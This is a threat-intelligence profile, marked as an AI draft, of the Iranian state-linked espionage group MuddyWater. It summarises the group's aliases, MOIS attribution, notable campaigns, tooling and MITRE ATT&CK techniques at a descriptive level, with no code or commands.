AI Draft ACTIVE

MuddyWater

Also known as: Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, MuddyKrill

Affiliation Iranian Ministry of Intelligence and Security

Motivation Espionage

Status active

Country Iran

First Seen 2017

Last Seen 2026

Target Sectors Government, Telecommunications, Defense, Finance, Oil and Natural Gas, Local Government

Target Geographies Middle East, Asia, Africa, Europe, North America

Executive Summary

MuddyWater is an Iranian state-sponsored cyber-espionage group publicly identified by U.S. Cyber Command and a joint advisory from the FBI, CISA, U.S. Cyber Command Cyber National Mission Force (CNMF), and UK NCSC as a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS). The group is tracked by MITRE ATT&CK as G0069 and is also reported under aliases including Static Kitten, Seedworm, TEMP.Zagros, MERCURY, Mango Sandstorm, and Earth Vetala.

Public government and research reporting describes MuddyWater as active since at least 2017. Its operations have targeted government and private-sector organizations across telecommunications, defense, local government, finance, and oil and natural gas sectors in the Middle East, Asia, Africa, Europe, and North America. MuddyWater maintains an espionage-focused profile, with technical activity built around phishing, exploitation of known vulnerabilities, remote access tooling, credential collection, and post-compromise staging.

Notable Campaigns

2017-present — Government and Commercial Network Targeting

The 2022 joint cybersecurity advisory describes MuddyWater activity against government and commercial networks across multiple regions. The advisory identifies telecommunications, defense, local government, and oil and natural gas organizations as part of the observed target set and provides intrusion patterns including spearphishing, exploitation of known vulnerabilities, and the use of open-source tools.

2021 — Middle East Government Intrusion Tracked by Mandiant

Mandiant reported a 2021 intrusion at a Middle East government customer under the UNC3313 cluster. Mandiant assessed with moderate confidence that UNC3313 was associated with TEMP.Zagros, which public reporting associates with MuddyWater. The intrusion involved targeted phishing, public remote-access software, and malware families including GRAMDOOR and STARWHALE.

2022 — Public Disclosure of MOIS-Linked Malware Activity

U.S. Cyber Command’s Cyber National Mission Force publicly disclosed malware samples and tools associated with Iranian intelligence actors tracked as MuddyWater. The disclosure described the group’s use of open-source tools, side-loading DLLs, obfuscated PowerShell, and JavaScript components used to connect to attacker-controlled infrastructure.

Technical Capabilities

MuddyWater operations rely on social engineering and known-vulnerability exploitation rather than only custom malware. Public reporting describes spearphishing emails, malicious documents, archive files, and links used to initiate access. The group has also exploited publicly known vulnerabilities and used legitimate remote access or remote management tools to maintain access in victim environments.

The group’s tooling has included POWERSTATS, POWGOOP, MORIAGENT, Small Sieve, Canopy, STARWHALE, and GRAMDOOR. CISA and MITRE reporting also document PowerShell, JavaScript, Visual Basic, command shell activity, DLL side-loading, credential-dumping utilities, and staged tool transfer during post-compromise operations.

MuddyWater’s tradecraft includes obfuscating scripts, using legitimate administrative tools, collecting credentials, and transferring additional payloads after initial access. MuddyWater is a persistent intelligence-collection group that blends custom tooling with publicly available offensive security tools and remote access software.

Attribution

Attribution to Iran’s Ministry of Intelligence and Security is documented in the public record. U.S. Cyber Command stated in January 2022 that MuddyWater is a subordinate element within MOIS, and the February 2022 joint advisory from FBI, CISA, CNMF, and UK NCSC repeated that assessment while describing global government and commercial targeting.

MITRE lists Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, and MuddyKrill as associated group names for MuddyWater. These names are considered public tracking aliases or overlapping reporting labels; attribution of Iran-nexus activity to MuddyWater requires direct evidence or cited source linkage.

MITRE ATT&CK Profile

Initial Access: MuddyWater uses spearphishing attachments and links (T1566.001) and has exploited public-facing applications or known vulnerabilities (T1190) to gain initial access.

Execution: The group uses PowerShell (T1059.001), Windows command shell, JavaScript, and Visual Basic execution paths to run payloads and post-compromise scripts.

Credential Access: Public reporting describes credential-dumping activity, including LSASS memory access (T1003.001) and use of credential theft utilities such as LaZagne.

Command and Control: MuddyWater has transferred tools into victim environments (T1105), used HTTP-based communications, and relied on public or legitimate infrastructure and remote access software during operations.

Collection and Exfiltration: MITRE reporting documents local data staging, archive creation, and exfiltration over command-and-control or cloud storage services in MuddyWater-linked activity.